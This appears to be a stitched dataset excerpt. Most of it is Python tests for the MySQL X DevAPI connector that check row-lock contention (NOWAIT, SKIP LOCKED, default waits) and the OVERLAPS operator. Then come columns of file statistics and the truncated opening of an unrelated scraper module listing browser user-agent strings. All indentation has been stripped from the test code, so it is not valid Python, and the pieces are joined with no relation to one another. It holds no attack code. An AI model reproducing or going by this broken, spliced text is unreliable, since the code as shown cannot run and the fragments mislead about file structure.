self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(NOWAIT) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_shared().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
try:
table2.select().where("name = 'James'").lock_exclusive(
mysqlx.LockContention.NOWAIT
).execute()
except mysqlx.OperationalError:
# Expected OperationalError
pass
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_x_x_nowait(self):
"""Test exclusive-exclusive with NOWAIT lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(NOWAIT) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_exclusive().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
try:
table2.select().where("name = 'James'").lock_exclusive(
mysqlx.LockContention.NOWAIT
).execute()
except mysqlx.OperationalError:
# Expected OperationalError
pass
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_x_s_nowait(self):
"""Test exclusive-shared with NOWAIT lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(NOWAIT) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_exclusive().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
try:
table2.select().where("name = 'James'").lock_shared(
mysqlx.LockContention.NOWAIT
).execute()
except mysqlx.OperationalError:
# Expected OperationalError
pass
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_s_s_skip_locked(self):
"""Test shared-shared with SKIP LOCKED lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(SKIP_LOCKED) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_shared().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
result = (
table2.select()
.where("name = 'James'")
.lock_shared(mysqlx.LockContention.SKIP_LOCKED)
.execute()
)
res = result.fetch_all()
self.assertEqual(len(res), 1)
self.assertEqual(res[0]["age"], 23)
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_s_x_skip_locked(self):
"""Test shared-exclusive with SKIP LOCKED lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(SKIP_LOCKED) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_shared().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
result = (
table2.select()
.where("name = 'James'")
.lock_exclusive(mysqlx.LockContention.SKIP_LOCKED)
.execute()
)
res = result.fetch_all()
self.assertEqual(len(res), 0)
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_x_x_skip_locked(self):
"""Test exclusive-exclusive with SKIP LOCKED lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(SKIP_LOCKED) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_exclusive().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
result = (
table2.select()
.where("name = 'James'")
.lock_exclusive(mysqlx.LockContention.SKIP_LOCKED)
.execute()
)
res = result.fetch_all()
self.assertEqual(len(res), 0)
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_x_s_skip_locked(self):
"""Test exclusive-shared with SKIP LOCKED lockcontention."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t").execute()
self.session.sql("create table t(name varchar(20), age int)").execute()
table = self.schema.get_table("t")
table.insert().values("Joe", 21).values("James", 23).execute()
# `session2.lock_exclusive(SKIP_LOCKED) returns data immediately.
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table1 = schema1.get_table("t")
session1.start_transaction()
table1.select().where("name = 'James'").lock_exclusive().execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table2 = schema2.get_table("t")
session2.start_transaction()
result = (
table2.select()
.where("name = 'James'")
.lock_shared(mysqlx.LockContention.SKIP_LOCKED)
.execute()
)
res = result.fetch_all()
self.assertEqual(len(res), 0)
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_s_s_default(self):
"""Test shared-shared lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t1").execute()
self.session.sql(
"create table t1(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t1")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t1")
session1.start_transaction()
table.select().where("name = 'James'").lock_shared().execute()
locking.set()
time.sleep(2)
locking.clear()
if waiting.is_set():
session1.commit()
self.fail(
"Table_S_S_DEFAULT_test IS NOT OK. Other thread is "
"waiting while it is not expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t1")
if not locking.wait(2):
self.fail(
"Table_S_S_DEFAULT_test IS NOT OK. Other thread has not "
"set the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_shared(
mysqlx.LockContention.DEFAULT
).execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t1").execute()
@tests.foreach_session()
def test_table_s_x_default(self):
"""Test shared-exclusive lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t2").execute()
self.session.sql(
"create table t2(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t2")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t2")
session1.start_transaction()
table.select().where("name = 'James'").lock_shared().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_S_X_DEFAULT_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t2")
if not locking.wait(2):
self.fail(
"Table_S_X_DEFAULT_test IS NOT OK. Other thread has not "
"set the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_exclusive(
mysqlx.LockContention.DEFAULT
).execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t2").execute()
@tests.foreach_session()
def test_table_x_x_default(self):
"""Test exclusive-exclusive lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t3").execute()
self.session.sql(
"create table t3(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t3")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t3")
session1.start_transaction()
table.select().where("name = 'James'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_X_X_DEFAULT_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t3")
if not locking.wait(2):
self.fail(
"Table_X_X_DEFAULT_test IS NOT OK. Other thread has not "
"set the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_exclusive(
mysqlx.LockContention.DEFAULT
).execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t3").execute()
@tests.foreach_session()
def test_table_x_s_default(self):
"""Test exclusive-exclusive lock."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t4").execute()
self.session.sql(
"create table t4(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t4")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t4")
session1.start_transaction()
table.select().where("name = 'James'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
session1.commit()
self.fail(
"Table_X_S_DEFAULT_test IS NOT OK. Other thread is not "
"waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t4")
if not locking.wait(2):
self.fail(
"Table_X_S_DEFAULT_test IS NOT OK. Other thread has not "
"set the lock!"
)
session2.start_transaction()
waiting.set()
table.select().where("name = 'James'").lock_shared(
mysqlx.LockContention.DEFAULT
).execute()
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t4").execute()
@tests.foreach_session()
def test_table_multiple_lock_contention_calls(self):
"""Test multiple lock calls."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t5").execute()
self.session.sql(
"create table t5(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t5")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t5")
session1.start_transaction()
table.select().where(
"name = 'James'"
).lock_exclusive().lock_shared().lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if waiting.is_set():
session1.commit()
self.fail(
"Table_Multiple_Lock_calls_test IS NOT OK. Other thread "
"is waiting while it is not expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t5")
if not locking.wait(2):
self.fail(
"Table_Multiple_Lock_calls_test IS NOT OK. Other thread "
"has not set the lock!"
)
session2.start_transaction()
waiting.set()
result = (
table.select()
.where("name = 'James'")
.lock_shared(mysqlx.LockContention.DEFAULT)
.lock_exclusive(mysqlx.LockContention.SKIP_LOCKED)
.lock_exclusive(mysqlx.LockContention.NOWAIT)
.lock_shared(mysqlx.LockContention.SKIP_LOCKED)
.execute()
)
res = result.fetch_all()
assert len(res) == 0
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t5").execute()
@tests.foreach_session()
def test_table_update_x_nowait(self):
"""Test lock exclusive and update().where - update().where will be
blocked until the lock is released."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t6").execute()
self.session.sql(
"create table t6(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t6")
table.insert().values("Joe", 21).values("James", 23).execute()
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t6")
session1.start_transaction()
table.update().where("name == 'James'").set("age", 30).execute()
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t6")
session2.start_transaction()
try:
table.select().where("name = 'James'").lock_exclusive(
mysqlx.LockContention.DEFAULT
).lock_shared(mysqlx.LockContention.SKIP_LOCKED).lock_exclusive(
mysqlx.LockContention.NOWAIT
).execute()
except mysqlx.OperationalError:
# Expected OperationalError
pass
session2.rollback()
session1.rollback()
self.session.sql("drop table if exists t6").execute()
session2.close()
session1.close()
@tests.foreach_session()
def test_table_update_s_skip_locked(self):
"""Test lock shared and update().where - update().where will be
blocked until the lock is released, but will be able to read."""
config = tests.get_mysqlx_config()
schema_name = config["schema"]
self.session.sql("drop table if exists t7").execute()
self.session.sql(
"create table t7(name varchar(20), age int)"
).execute()
table = self.schema.get_table("t7")
table.insert().values("Joe", 21).values("James", 23).execute()
locking = threading.Event()
waiting = threading.Event()
def thread_a(locking, waiting):
session1 = mysqlx.get_session(config)
schema1 = session1.get_schema(schema_name)
table = schema1.get_table("t7")
session1.start_transaction()
result = table.select().where("name == 'James'").execute()
assert result.fetch_all()[0]["age"] == 23
table.update().where("name == 'James'").set("age", 30).execute()
locking.set()
time.sleep(2)
locking.clear()
if waiting.is_set():
session1.commit()
self.fail(
"Table_Update_S_SKIP_LOCKED_test IS NOT OK. Other thread "
"is not waiting while it is expected to!"
)
session1.commit()
def thread_b(locking, waiting):
session2 = mysqlx.get_session(config)
schema2 = session2.get_schema(schema_name)
table = schema2.get_table("t7")
if not locking.wait(2):
self.fail(
"Table_Update_S_SKIP_LOCKED_test IS NOT OK. Other thread "
"has not set the lock!"
)
session2.start_transaction()
waiting.set()
result = (
table.select()
.where("name = 'James'")
.lock_exclusive(mysqlx.LockContention.NOWAIT)
.lock_shared(mysqlx.LockContention.SKIP_LOCKED)
.execute()
)
waiting.clear()
session2.commit()
client1 = threading.Thread(
target=thread_a,
args=(
locking,
waiting,
),
)
client2 = threading.Thread(
target=thread_b,
args=(
locking,
waiting,
),
)
client1.start()
client2.start()
client1.join()
client2.join()
self.session.sql("drop table if exists t7").execute()
@tests.foreach_session()
def test_overlaps_table_select1(self):
"""OVERLAPS operator with string on both sides - With LHS in RHS."""
self.session.sql("drop table if exists t1").execute()
self.session.sql("create table t1(a int , b int, c JSON)").execute()
table = self.schema.get_table("t1")
table.insert().values(1, 1, '{"comp":"abc"}').values(
2, 1, '{"comp":"pqr"}'
).values(3, 2, '{"comp":"xyz"}').execute()
result = (
table.select("a").where("'pqr' OVERLAPS c->'$.comp'").execute()
)
row = result.fetch_all()
self.assertEqual(len(row), 1)
self.assertEqual(row[0]["a"], 2)
self.session.sql("drop table if exists t1").execute()
@tests.foreach_session()
def test_overlaps_table_select2(self):
"""OVERLAPS operator with int as operand - With LHS in RHS."""
self.session.sql("drop table if exists t2").execute()
self.session.sql(
"create table t2(name varchar(20) , a JSON, c varchar(20))"
).execute()
table = self.schema.get_table("t2")
table.insert().values("a", '{"age":21}', "abc").values(
"b", '{"age":31}', "pqr"
).values("hell", '{"age":22}', "xyz").execute()
result = table.select().where("a->$.age OVERLAPS [21,31]").execute()
self.assertEqual(len(result.fetch_all()), 2)
self.session.sql("drop table if exists t2").execute()
@tests.foreach_session()
def test_overlaps_table_select3(self):
"""OVERLAPS operator with boolean as operand - With LHS in RHS."""
self.session.sql("create table t3(n JSON, a json, c JSON)").execute()
table = self.schema.get_table("t3")
table.insert().values(
'{"name":"joy"}', '{"age":18}', '{"comp":"abc"}'
).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values(
'{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}'
).execute()
result = table.select().where("21 OVERLAPS a->'$.age'").execute()
self.assertEqual(len(result.fetch_all()), 1)
self.session.sql("drop table if exists t3").execute()
@tests.foreach_session()
def test_overlaps_table_select4(self):
"""NOT OVERLAPS operator with string operand - With LHS not in RHS."""
self.session.sql("create table t4(n JSON, age int, c JSON)").execute()
table = self.schema.get_table("t4")
table.insert().values('{"name":"joy"}', 18, '{"comp":"abc"}').values(
'{"name":"happy"}', 21, '{"comp":"pqr"}'
).values('{"name":"sad"}', 32, '{"comp":"xyz"}').execute()
result = (
table.select().where("'happy' NOT OVERLAPS n->'$.name'").execute()
)
self.assertEqual(len(result.fetch_all()), 2)
self.session.sql("drop table if exists t4").execute()
@tests.foreach_session()
def test_overlaps_table_select5(self):
"""NOT OVERLAPS operator with int as operand - With LHS not in RHS."""
self.session.sql("create table t5(n JSON, a JSON, c JSON)").execute()
table = self.schema.get_table("t5")
table.insert().values(
'{"name":"joy"}', '{"age":18}', '{"comp":"abc"}'
).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values(
'{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}'
).execute()
result = (
table.select().where("[21,32] NOT OVERLAPS a->'$.age'").execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.session.sql("drop table if exists t5").execute()
@tests.foreach_session()
def test_overlaps_table_select6(self):
"""NOT OVERLAPS operator with boolean as operand - With LHS not
in RHS."""
self.session.sql(
"create table t6(name varchar(20) , age int, c json)"
).execute()
table = self.schema.get_table("t6")
table.insert().values("a", 21, '{"comp":"pqr"}').values(
"b", 31, '{"comp":"xyz"}'
).values("e", 22, '{"comp":"xyz"}').execute()
result = (
table.select()
.where("c->'$.comp' OVERLAPS ['pqr','abc']")
.execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.session.sql("drop table if exists t6").execute()
@tests.foreach_session()
def test_overlaps_table_select7(self):
"""OVERLAPS operator with different datatypes as operands."""
self.session.sql("create table t7(n JSON, a json, c JSON)").execute()
table = self.schema.get_table("t7")
table.insert().values(
'{"name":"joy"}', '{"age":18}', '{"comp":"abc"}'
).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values(
'{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}'
).execute()
result = table.select().where("21 OVERLAPS n->'$.name'").execute()
result1 = (
table.select().where("'b' OVERLAPS a->$.age").limit(1).execute()
)
self.assertEqual(len(result.fetch_all()), 0)
self.assertEqual(len(result1.fetch_all()), 0)
self.session.sql("drop table if exists t7").execute()
@tests.foreach_session()
def test_overlaps_table_select8(self):
"""OVERLAPS operator with single element on LHS and array/list on RHS
and vice versa."""
self.session.sql(
"create table t8(id int, n JSON, a JSON, p JSON)"
).execute()
table = self.schema.get_table("t8")
table.insert().values(
1, '{"name":"a"}', '{"age":21}', '{"prof":["x","y"]}'
).values(2, '{"name":"b"}', '{"age":24}', '{"prof":["p","q"]}').values(
3, '{"name":"c"}', '{"age":26}', '{"prof":["l","m"]}'
).execute()
result = (
table.select().where("a->$.age OVERLAPS [21,23,24,28]").execute()
)
result1 = (
table.select()
.where("n->'$.name' OVERLAPS ['a','b','c','d','e']")
.execute()
)
result2 = table.select().where("a->$.age OVERLAPS [(10+11)]").execute()
result3 = (
table.select().where("21 OVERLAPS [22,23]").limit(1).execute()
)
result4 = (
table.select().where("['p','q'] OVERLAPS p->'$.prof'").execute()
)
self.assertEqual(len(result.fetch_all()), 2)
self.assertEqual(len(result1.fetch_all()), 3)
self.assertEqual(len(result2.fetch_all()), 1)
self.assertEqual(len(result3.fetch_all()), 0)
self.assertEqual(len(result4.fetch_all()), 1)
self.session.sql("drop table if exists t8").execute()
@tests.foreach_session()
def test_overlaps_table_select9(self):
"""OVERLAPS operator with single element on LHS and dict on RHS
and vice versa."""
self.session.sql("drop table if exists t9").execute()
self.session.sql(
"create table t9(id int, name varchar(20), a JSON, ai JSON)"
).execute()
table = self.schema.get_table("t9")
table.insert().values(
1,
"a",
'{"age":23}',
'{"additionalinfo":["reading","music","playing"]}',
).values(
2, "b", '{"age":21}', '{"additionalinfo":["boxing","music"]}'
).execute()
result = (
table.select()
.where("'reading' OVERLAPS ai->$.additionalinfo")
.execute()
)
result1 = table.select().where("'music' OVERLAPS a->$.age").execute()
result2 = (
table.select()
.where("'music' OVERLAPS ai->$.additionalinfo")
.execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.assertEqual(len(result1.fetch_all()), 0)
self.assertEqual(len(result2.fetch_all()), 2)
self.session.sql("drop table if exists t9").execute()
@tests.foreach_session()
def test_overlaps_table_select10(self):
"""OVERLAPS operator with array/list operand on LHS and array/list
on RHS."""
self.session.sql("drop table if exists t10").execute()
self.session.sql(
"create table t10(i JSON, n JSON, a JSON, ai JSON)"
).execute()
table = self.schema.get_table("t10")
table.insert().values(
'{"id":1}',
'{"name":"joy"}',
'{"age":21}',
'{"additionalinfo":["reading","music","playing"]}',
).values(
'{"id":2}',
'{"name":"happy"}',
'{"age":24}',
'{"additionalinfo":["playing","painting","boxing"]}',
).execute()
result = (
table.select()
.where(
"['playing','painting','boxing'] OVERLAPS ai->'$.additionalinfo'"
)
.execute()
)
result1 = (
table.select()
.where('["happy","joy"] OVERLAPS n->$.name')
.limit(1)
.execute()
)
result2 = (
table.select()
.where('["reading"] NOT OVERLAPS ai->$.additionalinfo')
.limit(1)
.execute()
)
self.assertEqual(len(result.fetch_all()), 2)
self.assertEqual(len(result1.fetch_all()), 1)
self.assertEqual(len(result2.fetch_all()), 1)
self.session.sql("drop table if exists t10").execute()
@tests.foreach_session()
def test_overlaps_table_select11(self):
"""OVERLAPS operator with dict on LHS and dict on RHS."""
self.session.sql("drop table if exists t11").execute()
self.session.sql(
"create table t11(i JSON, n JSON, a JSON, ai JSON)"
).execute()
table = self.schema.get_table("t11")
table.insert().values(
'{"id":1}',
'{"name":"joy"}',
'{"age":21}',
'{"additionalinfo":[{"company":"xyz","vehicle":"bike"},{"company":"abc","vehicle":"car"},{"company":"mno","vehicle":"zeep"}]}',
).values(
'{"id":2}',
'{"name":"happy"}',
'{"age":24}',
'{"additionalinfo":[{"company":"abc","vehicle":"car"},{"company":"pqr","vehicle":"bicycle"}]}',
).execute()
result = table.select(
'{"company":"abc","vehicle":"car"} OVERLAPS ai->"$.additionalinfo"'
).execute()
result1 = (
table.select()
.where('{"vehicle":"car"} NOT OVERLAPS ai->"$.additionalinfo"')
.execute()
)
result2 = (
table.select()
.where('{"company":"mno"} OVERLAPS ai->"$.additionalinfo"')
.execute()
)
self.assertEqual(len(result.fetch_all()), 2)
self.assertEqual(len(result1.fetch_all()), 2)
self.assertEqual(len(result2.fetch_all()), 0)
self.session.sql("drop table if exists t11").execute()
@tests.foreach_session()
def test_overlaps_table_select12(self):
"""OVERLAPS operator with operands having expressions."""
self.session.sql("drop table if exists t12").execute()
self.session.sql(
"create table t12(id int, name varchar(20), age int)"
).execute()
table = self.schema.get_table("t12")
table.insert().values(1, "a", 21).values(2, "b", 22).values(
3, "c", 32
).execute()
result = (
table.select()
.where("[(1>5)] OVERLAPS [true, false]")
.limit(1)
.execute()
)
result1 = (
table.select()
.where("[('a'>'b')] overlaps [true, false]")
.limit(1)
.execute()
)
result2 = (
table.select()
.where(
"true OVERLAPS [(1>5), !(false), (true || false), (false && true)]"
)
.limit(1)
.execute()
)
result3 = (
table.select()
.where("cast((2+3) as JSON) OVERLAPS [1,2,3,4,5]")
.limit(1)
.execute()
)
self.assertEqual(len(result.fetch_all()), 1)
self.assertEqual(len(result1.fetch_all()), 1)
self.assertEqual(len(result2.fetch_all()), 1)
self.assertEqual(len(result3.fetch_all()), 1)
self.session.sql("drop table if exists t12").execute()
@tests.foreach_session()
def test_overlaps_table_select13(self):
"""OVERLAPS operator with operands having expressions."""
self.session.sql("drop table if exists t13").execute()
self.session.sql("create table t13(i json, n json, a json)").execute()
table = self.schema.get_table("t13")
table.insert().values('{"id":1}', '{"name":"a"}', '{"age":21}').values(
'{"id":2}', '{"name":"b"}', '{"age":22}'
).execute()
self.assertRaises(
mysqlx.OperationalError,
table.select().where("(1+5) OVERLAPS [1,2,3,4,5,6]").execute,
)
# self.assertEqual(len(result.fetch_all()), 2)
self.session.sql("drop table if exists t13").execute()
@tests.foreach_session()
def test_overlaps_table_select14(self):
"""OVERLAPS operator: search for empty string in a field and field
in empty string."""
self.session.sql("drop table if exists t14").execute()
self.session.sql("create table t14(id int, n JSON, age int)").execute()
table = self.schema.get_table("t14")
table.insert().values(1, '{"name":"a"}', 21).values(
2, '{"name":"b"}', 22
).values(3, '{"name":"c"}', 32).execute()
result = table.select().where("'' OVERLAPS n->'$.name'").execute()
result1 = (
table.select().where("n->'$.name' OVERLAPS ['', ' ']").execute()
)
self.assertEqual(len(result.fetch_all()), 0)
self.assertEqual(len(result1.fetch_all()), 0)
self.session.sql("drop table if exists t14").execute()
| 37.544902
| 139
| 0.549462
| 9,786
| 86,541
| 4.757306
| 0.04067
| 0.04891
| 0.062249
| 0.051036
| 0.93483
| 0.921254
| 0.907013
| 0.90102
| 0.876297
| 0.859585
| 0
| 0.028972
| 0.30084
| 86,541
| 2,304
| 140
| 37.561198
| 0.740455
| 0.066258
| 0
| 0.82046
| 0
| 0.001535
| 0.177134
| 0.019904
| 0
| 0
| 0
| 0
| 0.056266
| 1
| 0.048593
| false
| 0.003069
| 0.002558
| 0
| 0.051662
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d75a62e9cfe0af15bf0379feb85c4a43cdb3e57a
| 2,770
|
py
|
Python
|
webplucker/req_handler/agents/__init__.py
|
shivjeetbhullar/webplucker
|
b88a9a62932a2f9de3c62c2e0ec923dff1111ff7
|
[
"MIT"
] | null | null | null |
webplucker/req_handler/agents/__init__.py
|
shivjeetbhullar/webplucker
|
b88a9a62932a2f9de3c62c2e0ec923dff1111ff7
|
[
"MIT"
] | null | null | null |
webplucker/req_handler/agents/__init__.py
|
shivjeetbhullar/webplucker
|
b88a9a62932a2f9de3c62c2e0ec923dff1111ff7
|
[
"MIT"
] | null | null | null |
from random import shuffle
agents = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 